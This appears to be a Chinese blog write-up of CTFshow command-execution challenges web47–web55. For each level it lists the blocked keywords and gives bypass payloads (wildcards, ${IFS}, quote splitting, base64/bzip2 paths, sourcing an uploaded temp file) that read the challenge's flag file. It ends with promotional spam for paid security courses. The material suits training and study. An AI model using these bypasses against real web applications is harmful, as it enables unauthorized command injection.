CTFshow web入门 web41~web55 命令执行_ctfshow web41,看完我工资从12K变成了20K

image-20230414162336525

web47(过滤more、less、head、sort、tail)

image-20230414165009877

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail

构造payload:

?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
?c=nl<fla*%0a
?c=nl<fla\g.php%0a

image-20230414165413283

web48(过滤sed、cut、awk、strings、od、curl、[反引号])

image-20230414165905048

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]

构造payload:

还是一样
?c=nl%09???.???%0a
?c=nl%09fla\g.php%0a
?c=nl%09fla’'g.php%0a
?c=nl<fla\g.php%0a

image-20230414170312783

web49(过滤%)

image-20230414170351596

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%

构造payload:

%被过滤掉了,能用的就少很多了,但还是有
?c=nl<fla’'g.php||
?c=nl<fla\g.php||

image-20230414185453080

web50(过滤\x09、\x26)

image-20230414185606716

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、awk、strings、od、curl、[反引号]、%、\x09、\x26

\x09与\x26的含义其实就是%09(tab键)和%26(&)

构造payload:

?c=nl<fla’'g.php||
?c=nl<fla\g.php||

image-20230414190207794

web51(过滤tac)

image-20230414190524086

过滤了:

;、cat、flag、[空格]、[0-9]、$、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26

多过滤了一个tac(我寻思着我也不怎么用啊)

构造payload:

?c=nl<fla’'g.php||
?c=nl<fla\g.php||

image-20230414190729310

web52(过滤>、<)

image-20230414191003142

过滤了:

;、cat、flag、[空格]、[0-9]、*、more、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、[反引号]、%、\x09、\x26、>、<

这回终于把>和<过滤掉了,但

又给开了,

又给开了,

又给开了,想到的第一个就是${IFS}的空格替换

构造payload:

?c=nl${IFS}fla’'g.php||

image-20230414191702807

找到了,但没完全找到,去根目录看看有没有东西

?c=ls${IFS}/||

image-20230414192220112

发现有个flag,cat和ls试了一下,都没有回显,看来是个文件,直接nl

?c=nl${IFS}/fla’'g|| // 注意这个/表示根目录下的flag,不加/就会是本目录下的

image-20230414193225885

web53(过滤+简单代码审计)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6ZaP4O5W-1681564193907)(C:/Users/%E7%8B%AC%E8%B4%A4/AppData/Roaming/Typora/typora-user-images/image-20230414193615256.png)]

过滤了:

;、cat、flag、[空格]、[0-9]、*、more、wget、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、`、%、\x09、\x26、>、<

简单分析一下,if中的语句第一个是输出GET传入的参数、第二个是执行c的语句后得到的东西赋值给d、第三个是换行后在输出d的内容。if判断错误的话会输出no

构造payload:

先在目录看一眼
?c=ls${IFS}

image-20230414194912462

直接进flag.php
?c=nl${IFS}fla’'g.php

image-20230414195130724

web54(grep查找/文件重命名)

image-20230415185352671

过滤了一堆

; .*c.*a.t. .*f.*l.a.g. [空格] [0-9]、
.*m.*o.*r.e. .*w.*g.*e.t. .*l.*e.*s.s.
.*h.*e.*a.d. .*s.*o.*r.t. .*t.*a.*i.l.
.*s.*e.d. .*c.*u.t. .*t.*a.c. .*a.*w.k.
.*s.*t.*r.*i.*n.*g.s. .*o.d. .*c.*u.*r.l.
.*n.l. .*s.*c.p. .*r.m. ` %
\x09 x26 > <

这回是真正意义上的禁用了这些命令了,以前还能通过中间添加一些特殊符号来绕过的,现在是完全不能使用了,毕竟 . 后面跟上一个通配符后,就完全不能在中间加点什么了

像这种可以选择使用之前讲过的一种用?通配符来构造的方式,如:

对flag.php的构造可以这样:fl??.???
甚至可以简化为:???

同样,命令也可以进行构造
cat可以构造为?at、c??

构造payload:

?c=/bin/c??${IFS}???
这里的/bin/是指bin目录下检索c??,不然在当前目录是没有这个命令的

另外grep命令可以才文件中查找含有的字符串
形式:grep [字符串] [filename]
?c=grep I F S c t f s h o w {IFS}ctfshow IFSctfshow{IFS}???

image-20230415192017797

image-20230415192120325

另外,对于这题重命名文件也是一个不错的思路:

?c=mv I F S f l ? ? . ? ? ? {IFS}fl??.??? IFSfl??.???{IFS}a.txt
把flag.php重命名为了a.txt
然后直接访问a.txt就行了

image-20230415192302408

web55(无字母rce)

image-20230415192806690

过滤了:

;、[a-z]、`、%、\x09、\x26、>、<

方法一:

同样能够使用?通配符,区区过滤掉字母而已,既然数字没有过滤的话,可以使用base64

构造payload:

?c=/???/???64 ???.???
意思为:?c=/bin/base64 flag.php

image-20230415193845510

image-20230415194900372

方法二:

使用/usr/bin/bzip2 对文件进行压缩

构造payload:

?c=/???/???/???2 ???.???
意思为:?c=/usr/bin/bzip2 flag.php

最后访问/flag.php.bz2即可
下载下来的压缩包中包含有flag.php

image-20230415204608558

image-20230415204544427

image-20230415204633453

方法三:

.(点)的用法,相当于source,可以执行sh命令

在linux里面临时存放文件的目录可能会被定时删除
这个目录是/tmp,然后一般网页文件会命名为php???,后面是随机的字母,即:/tmp/phpXXXXXX
所以我们需要规定一个范围[@-[],从@-[就是26个字母然后关于上传文件的内容

php生成临时文件名是随机的,最后一个字符不一定是大写字母,不过多尝试几次也就行了

既然要上传的文件能执行内容,所以添加内容/bin/sh

因为linux系统下一切皆文件,所以一些个内置程序都是由文件组成的
/bin目录下存放的都是协议shell脚本的内容,sh就是执行shell脚本,可以理解为打开终端
只有打开终端我们再能输入命令
然后就可以在文件里面在添加ls,cat等一系列读取文件的命令了

需要构造一个post上传文件的数据包,上传的目的链接要改成题目的链接

POST数据包POC

然后对该界面进行抓包,选择文件的话随便传一个就行了

构造poc(漏洞执行代码),用来执行命令

?c=.%20/???/???[@-[] // %20也可以用+代替
+在这里是一个空格的作用,?是要进行匹配的字符,[@-[]表示@到[之间的字符,这里是包括有所有大写字母

image-20230415200208337

然后在bp抓包界面添加sh命令

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

nvert/5072ce807750c7ec721c2501c29cb7d5.png)

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

一个人可以走的很快,但一群人才能走的更远。如果你从事以下工作或对以下感兴趣,欢迎戳这里加入程序员的圈子,让我们一起学习成长!

AI人工智能、Android移动开发、AIGC大模型、C C#、Go语言、Java、Linux运维、云计算、MySQL、PMP、网络安全、Python爬虫、UE5、UI设计、Unity3D、Web前端开发、产品经理、车载开发、大数据、鸿蒙、计算机网络、嵌入式物联网、软件测试、数据结构与算法、音视频开发、Flutter、IOS开发、PHP开发、.NET、安卓逆向、云计算

  • 18
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值